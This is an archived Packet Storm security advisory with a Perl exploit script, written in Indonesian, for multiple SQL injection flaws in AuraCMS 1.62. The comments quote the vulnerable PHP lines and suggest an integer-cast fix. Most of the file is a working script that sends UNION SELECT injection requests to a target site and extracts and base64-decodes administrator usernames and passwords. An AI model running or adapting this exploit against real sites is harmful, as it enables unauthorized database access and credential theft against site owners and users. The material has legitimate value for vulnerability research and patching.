auracms162-sql.txt

2008-02-18T00:00:00
ID PACKETSTORM:63710
Type packetstorm
Reporter NTOS-Team
Modified 2008-02-18T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Indonesian Newhack Security Advisory  
# ------------------------------------  
# AuraCMS 1.62 Multiple Remote SQL Injection Exploit  
# Waktu : Feb 15 2008 01:00PM  
# Software : AuraCMS   
# Versi : 1.62  
# Vendor : http://www.auracms.org/  
#  
# ------------------------------------  
# Audit Oleh : NTOS-Team  
# Lokasi : Indonesia | http://newhack.org  
# Penjelasan :  
#   
# => Kutu pada berkas /mod/dl.php  
# --//--  
# 8. $aksi=$_GET[aksi];   
# 9. $laporan=$_GET[laporan];  
# 10. $kategori=$_GET[kategori]; if(!$kategori) $kategori=$_POST[kategori];  
# 11. $kid=$_GET[kid]; if(!$kid) $kid=$_POST[kid];  
# 12. $id=$_GET[id]; if(!$id) $id=$_POST[id];  
# 13. $submit=$_POST[submit];  
# 14. $mulai=$_GET[mulai];  
# 15. $hal=$_GET[hal];  
# 16. $brokens=$_GET[brokens];  
# --//--  
# 59.if ($aksi=="lihat"){  
# 60.  
# 61.$numresult = mysql_query("SELECT * FROM dl WHERE kid='$kid' AND tipe='aktif' ORDER BY id DESC");  
# 62.  
# 63.$jmlrec = mysql_num_rows($numresult);  
# --//--  
# jika magic_quotes_gpc = off pada server maka pengguna dapat memanipulasi pernyataan SQL secara remote pada variabel "kid"  
# Contoh;  
# http://site.korban/auracms162/index.php?pilih=dl&mod=yes&aksi=lihat&kategori=&kid=-9'[SQLI]  
#  
# => Kutu pada berkas /mod/links.php  
# --//--  
# 8. $aksi=$_GET[aksi];  
# 9. $kategori=$_GET[kategori]; if(!$kategori) $kategori=$_POST[kategori];  
# 10. $kid=$_GET[kid]; if(!$kid) $kid=$_POST[kid];  
# 11. $id=$_GET[id]; if(!$id) $id=$_POST[id];  
# 12. $submit=$_POST[submit];  
# 13. $mulai=$_GET[mulai];  
# 14. $hal=$_GET[hal];  
# 15. $brokens=$_GET[brokens];  
# 16. $laporan=$_GET[laporan];  
# --//--  
# 59.if ($aksi=="lihat"){  
# 60.  
# 61.$numresult = mysql_query("SELECT * FROM links WHERE kid='$kid' AND tipe='aktif' ORDER BY id DESC");  
# 62.  
# 63.$jmlrec = mysql_num_rows($numresult);  
# --//--  
# jika magic_quotes_gpc = off pada server maka pengguna dapat memanipulasi pernyataan SQL secara remote pada variabel "kid"  
# Contoh;  
# http://site.korban/auracms162/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-9'[SQLI]  
#  
# => Kutu pada berkas /search.php  
# --//--  
# 8. $query=$_GET[query];  
# --//--  
# 19. $perintah="SELECT * FROM artikel WHERE ((judul LIKE '%$query%' OR konten LIKE '%$query%' OR user LIKE '%$query%')AND publikasi=1)";  
# 20. $hasil=mysql_query($perintah, $koneksi_db);  
# 21. $jumlah1=mysql_numrows($hasil);  
# 22.  
# 23. $perintah="SELECT * FROM halaman WHERE (judul LIKE '%$query%' OR konten LIKE '%$query%')";  
# 24. $hasil=mysql_query($perintah, $koneksi_db);  
# 25. $jumlah2=mysql_numrows($hasil);   
# --//--  
# jika magic_quotes_gpc = off pada server maka pengguna dapat memanipulasi pernyataan SQL secara remote pada variabel "query"  
# Contoh;  
# http://site.korban/index.php?query=t4mugel4p')[SQLI]&pilih=search  
#   
# => perbaikan sederhana  
# pada berkas "mod/dl.php" dan "mod/links.php"  
# ubah kode ;  
# $kid=$_GET[kid]; if(!$kid) $kid=$_POST[kid];  
# menjadi  
# $kid=(int)$_GET[kid]; if(!$kid) $kid=(int)$_POST[kid];  
# dan buat magic_quotes_gpc = on pada server  
# pada berkas "/search.php" buat fungsi penyaringan "query" dan hidupkan magic_quotes_gpc  
#   
# => Perhatian!  
# "Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari"  
# Segela penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami  
#   
# =>Newhack Technology, OpenSource & Security  
# ~ NTOS-Team->[fl3xu5,k1tk4t,opt1lc] ~   
use LWP::UserAgent;  
use Getopt::Long;  
use MIME::Base64;  
  
if(!$ARGV[2])  
{  
print "\n |-------------------------------------------------------|";  
print "\n | Indonesian Newhack Technology |";  
print "\n |-------------------------------------------------------|";  
print "\n | AuraCMS 1.62 Multiple Remote SQL Injection Exploit |";  
print "\n | Coded by NTOS-Team |";  
print "\n |-------------------------------------------------------|";  
print "\n[!] ";  
print "\n[!] Exploit Berhasil jika magic_quotes_gpc = off pada server";  
print "\n[!] Penggunaan : perl aura162sqli.pl [Site] [Path] [Option]";  
print "\n[!] [Option] 1 = dl.php | 2 = links.php | 2 = search.php ";  
print "\n[!] Contoh : perl aura162sqli.pl localhost /aura162/ -o 1";  
print "\n[!] ";  
print "\n";  
exit;  
}  
$site = $ARGV[0]; # Site Target  
$path = $ARGV[1]; # Path direktori vKios  
  
%options = ();  
GetOptions(\%options, "o=i",);  
if($options{"o"} && $options{"o"} == 1)   
{   
$sql = "http://".$site.$path."index.php?pilih=dl&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*";   
}  
if($options{"o"} && $options{"o"} == 2)   
{   
$sql = "http://".$site.$path."index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*";   
}  
if($options{"o"} && $options{"o"} == 3)   
{   
$sql = "http://".$site.$path."index.php?query=1nj3ks1')union+select+0,concat(0x74346d7520,user,0x20673074),concat(0x67656c347020,password,0x20673074)+from+user+limit+0,1/*&pilih=search";   
}  
  
$www = new LWP::UserAgent;  
print "\n\n [!] Injeksi SQL \n";  
$res = $www -> get($sql) or err();  
$hasil = $res -> content;  
if( $hasil =~ /t4mu (.*?) g0t/ )  
{   
print "\n [+] Username : $1";   
$hasil =~ /gel4p (.*?) g0t/ , print "\n [+] Password : $1";   
print "\n [+] base64 decode : "; print decode_base64($1); print "\n\n"  
}   
else   
{   
print "\n [-] Exploit gagal ;) - magic_quotes_gpc = on";  
exit();  
}  
  
`